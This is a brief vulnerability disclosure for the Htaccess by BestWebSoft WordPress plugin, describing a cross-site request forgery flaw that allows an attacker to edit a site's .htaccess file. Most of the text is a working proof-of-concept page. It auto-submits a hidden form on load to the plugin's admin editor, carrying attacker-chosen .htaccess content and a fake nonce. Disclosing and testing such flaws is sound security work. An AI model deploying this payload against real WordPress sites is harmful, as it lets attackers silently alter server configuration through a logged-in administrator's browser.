The Htaccess by BestWebSoft WordPress plugin was affected by a CSRF to edit .htaccess security vulnerability.
<html>
<body onload="document.forms[0].submit();">
<form action="https://[WP]/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" method="POST">
<input type="hidden" name="htccss_customise" value="# Modified by CSRF" />
<input type="hidden" name="htccss_form_custom" value="submit" />
<input type="hidden" name="htccss_submit_button_custom" value="Save+Changes" />
<input type="hidden" name="htccss_nonce_name" value="attacker" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=htaccess.php&action=htaccess_editor" />
</form>
</body>
</html>